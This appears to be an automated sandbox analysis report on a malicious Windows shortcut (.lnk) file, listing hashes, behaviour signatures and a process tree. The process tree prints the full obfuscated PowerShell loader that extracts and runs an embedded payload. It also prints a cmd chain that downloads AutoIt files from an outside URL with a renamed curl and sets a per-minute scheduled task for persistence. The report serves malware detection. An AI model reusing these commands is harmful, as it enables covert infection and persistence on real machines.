Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
-
submitted
03/06/2024, 07:09
General
-
Target
0329bb5b3a450b0a8f148a57e045bf6ed40eb49a62e026bd71b021a2efc40aed.lnk
-
Size
134KB
-
MD5
3c81dc763a4f003ba6e33cd5b63068cd
-
SHA1
788f550a6c92a66d5934814008fba82807d59978
-
SHA256
0329bb5b3a450b0a8f148a57e045bf6ed40eb49a62e026bd71b021a2efc40aed
-
SHA512
553f41cf757c8471f8d1c5bf92f0845961f88e3b5ed57d70127bf82e65e3cea451d836ee0a672256cf1f7d9a6d35bba97153445fa128c843336f80d5f4f68605
-
SSDEEP
384:QMg1q2sZ9069Cjzy09JsOlg9IQSMnOpIQ5Rtn1JfzwtIhJ4mcRwGmYdHdevGS:M1q2s7vCjz3JFlg9NOpnRtnDfyIhiR6L
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\0329bb5b3a450b0a8f148a57e045bf6ed40eb49a62e026bd71b021a2efc40aed.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$hop=0;<#GIY RUTl#>$biology=Get-ChildItem *.lnk;<#bRw jJdU#>$biology=$biology|where-object{$_.length -eq 0x00021A74};<#qrv MgIn#>$solar=$biology;<#mxn HZhN#>$biology=$biology|Select-Object -ExpandProperty Name;<#rIK MwyN#>if($biology.length -eq 0){$hop=1;<#ASz DSTA#>$biology=Get-ChildItem -Path $env:TEMP -Recurse -Filter *.lnk|where-object{$_.length -eq 0x00021A74}|ForEach-Object{$_.FullName}|Select-Object -First 1;<#FkS JkMV#>$solar=$biology};<#olF nTjZ#>$basenformation=$biology.substring(0,$biology.length-4);<#EXA YWNK#>$hay=[System.IO.BinaryReader]::new([System.IO.File]::open($biology,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read,[System.IO.FileShare]::None));<#ygS HpYj#>try{$hay.BaseStream.Seek(0x000014DB,[System.IO.SeekOrigin]::Begin);<#HcP lkeu#>$become=$hay.ReadBytes(0x00006C00);<#fRh EYmr#>}finally{$hay.Close()};<#znL egKn#>for($base=0;<#BON QpOD#>$base -lt $become.count;<#Naq AxsH#>$base++){$become[$base]=$become[$base] -bxor 0x00};<#kNc kUfd#>[System.IO.File]::WriteAllBytes($basenformation,$become);<#UJR rpxR#>if($hop -eq 1){$grain=$basenformation}else{$grain='.\'+$basenformation};<#Vub TBmC#>& $grain;<#Tyu YeQS#>remove-item -path $solar -force;<#xld ZFYv#>"&mkdir c:\QyvXzoE & attrib +h c:\QyvXzoE & cd /d c:\QyvXzoE & copy c:\windows\system32\curl.exe QyvXzoE.exe & QyvXzoE -k -o AutoIt3.exe https://phasechangesolutions.com/wp-admin/css/colors/coffee/hurryup/?rv=super^&za=mongo0 & QyvXzoE -k -o zXLGKyU.au3 https://phasechangesolutions.com/wp-admin/css/colors/coffee/hurryup/?rv=super^&za=mongo1 & s^ch^ta^sks /delete /tn "zXLGKyU" /f & s^ch^ta^sks /create /sc minute /mo 1 /tn "zXLGKyU" /tr "c:\QyvXzoE\AutoIt3.exe c:\QyvXzoE\zXLGKyU.au3"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od3⤵
-
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$hop=0;<#GIY RUTl#>$biology=Get-ChildItem *.lnk;<#bRw jJdU#>$biology=$biology|where-object{$_.length -eq 0x00021A74};<#qrv MgIn#>$solar=$biology;<#mxn HZhN#>$biology=$biology|Select-Object -ExpandProperty Name;<#rIK MwyN#>if($biology.length -eq 0){$hop=1;<#ASz DSTA#>$biology=Get-ChildItem -Path $env:TEMP -Recurse -Filter *.lnk|where-object{$_.length -eq 0x00021A74}|ForEach-Object{$_.FullName}|Select-Object -First 1;<#FkS JkMV#>$solar=$biology};<#olF nTjZ#>$basenformation=$biology.substring(0,$biology.length-4);<#EXA YWNK#>$hay=[System.IO.BinaryReader]::new([System.IO.File]::open($biology,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read,[System.IO.FileShare]::None));<#ygS HpYj#>try{$hay.BaseStream.Seek(0x000014DB,[System.IO.SeekOrigin]::Begin);<#HcP lkeu#>$become=$hay.ReadBytes(0x00006C00);<#fRh EYmr#>}finally{$hay.Close()};<#znL egKn#>for($base=0;<#BON QpOD#>$base -lt $become.count;<#Naq AxsH#>$base++){$become[$base]=$become[$base] -bxor 0x00};<#kNc kUfd#>[System.IO.File]::WriteAllBytes($basenformation,$become);<#UJR rpxR#>if($hop -eq 1){$grain=$basenformation}else{$grain='.\'+$basenformation};<#Vub TBmC#>& $grain;<#Tyu YeQS#>remove-item -path $solar -force;<#xld ZFYv#>"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h c:\QyvXzoE3⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "zXLGKyU" /f3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zXLGKyU" /tr "c:\QyvXzoE\AutoIt3.exe c:\QyvXzoE\zXLGKyU.au3"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {196423A3-73FB-4862-9CE0-B20B88D71441} S-1-5-21-268080393-3149932598-1824759070-1000:UHRQKJCP\Admin:Interactive:[1]1⤵